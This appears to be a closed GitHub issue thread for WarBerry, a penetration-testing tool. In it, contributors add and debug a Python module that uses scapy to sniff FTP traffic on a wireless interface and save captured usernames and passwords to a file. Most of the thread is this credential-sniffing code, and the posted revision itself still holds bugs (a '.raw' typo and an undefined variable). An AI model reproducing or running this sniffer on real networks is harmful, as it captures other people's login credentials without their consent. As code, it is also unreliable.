Closed ghost closed 7 years ago
nice one mate. i will test and incorporate
it works sometimes and sometimes it fails with the following error
[ FTP CREDS SNIFFER MODULE ]
[] Sniffing for 20 seconds on interface wlan0 Traceback (most recent call last): File "warberry.py", line 313, in
main() File "warberry.py", line 161, in main ftp_creds(iface, expire) File "/home/pi/WarBerry/warberry/src/core/enumeration/ftppwn.py", line 26, in ftp_creds sniff(filter='tcp port 21', prn=ftpSniff, timeout=expire, iface=iface) File "/usr/lib/python2.7/dist-packages/scapy/sendrecv.py", line 586, in sniff r = prn(p) File "/home/pi/WarBerry/warberry/src/core/enumeration/ftppwn.py", line 10, in ftpSniff user = re.findall('(?i)USER (. )'.raw) # username AttributeError: 'str' object has no attribute 'raw'
I changed your code as following
>
> def ftpSniff(pkt):
> if os.path.isfile('../Results/ftpcreds'):
> print bcolors.WARNING + "[!] FTP Creds Results File Exists. Previous Results will be overwritten\n " + bcolors.ENDC
> dest = pkt.getlayer(IP).dst
> raw = pkt.sprintf('%Raw.load%')
> user = re.findall('(?i)USER (.*)'.raw) # username
> passwd = re.findall('(?i)PASS (.*)'.raw) # password
> with open('../Results/ftpcreds', 'w') as ftpcreds:
> if user:
> print bcolors.OKGREEN + "[+] Detected FTP login to: " + str(dst) + bcolors.ENDC
> print("[!] User account: " + str(user[0]))
> ftpcreds.write(str(dst) + " " + str(user[0]))
> elif passwd:
> print("[!] Password: " + str(passwd[0]))
> ftpcreds.write(str(dst) + " " + str(passwd[0]))
>
>
> def ftp_creds(iface, expire):
> print " "
> print bcolors.OKGREEN + " [ FTP CREDS SNIFFER MODULE ]\n" + bcolors.ENDC
> print '[*] Sniffing for %d seconds on interface %s' % (expire, iface)
> sniff(filter='tcp port 21', prn=ftpSniff, timeout=expire, iface=iface)
> print bcolors.OKGREEN + "[+] " + bcolors.ENDC + "Capture Completed." + bcolors.ENDC + " Results saved at " + bcolors.OKGREEN + "../WarBerry/Results/ftpcreds!\n" + bcolors.ENDC
>
>
Looks good to me :)
passed on for later releases
Adds a module to sniff FTP credentials for the value of
expire
variable using the interfaceiface
variable. The original script is available on my Github.